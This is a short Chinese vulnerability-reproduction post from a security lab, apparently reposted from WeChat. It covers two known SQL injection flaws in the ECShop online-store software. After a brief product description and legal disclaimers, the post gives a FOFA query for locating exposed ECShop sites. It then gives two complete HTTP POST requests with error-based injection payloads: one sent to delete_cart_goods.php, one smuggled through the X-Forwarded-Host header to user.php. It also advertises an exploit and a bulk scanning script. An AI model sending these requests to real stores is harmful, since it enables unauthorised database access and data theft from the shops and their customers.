0x01 阅读须知
SCA御盾实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
(一) Ecshop
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。最新版本为4.0.0。ECShop开发了独有的高效模板引擎(2.15以前版本使用smarty模板引擎),并结合了Dreamweaver的模板和库功能,使得编辑制作模板变得更简单。此外,ECShop还具有开放的插件机制、功能AJAX化、促销功能、高效率的代码和执行性能、搜索引擎优化、内置手机短信网关以及多语言支持等多种特色功能。
fofa语法:
app="ECShop"
(二) 漏洞复现
注入1:
POST /delete_cart_goods.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Content-Type: application/x-www-form-urlencoded
id=0||(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))
注入2(后台注入):
POST /user.php?act=collection_list HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
X-Forwarded-Host': '45ea207d7a2b68c49582d2d22adf953apay_log|s:55:"1' and updatexml(1,insert(user(),1,1,0x7e),1) and '";|45ea207d7a2b68c49582d2d22adf953a
Cookie:ECS_ID={{ecsid}}
漏洞exp+漏洞批量扫描脚本发布在知识星球
原文始发于微信公众号(SCA御盾):【漏洞复现】(nday)Ecshop两个注入复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论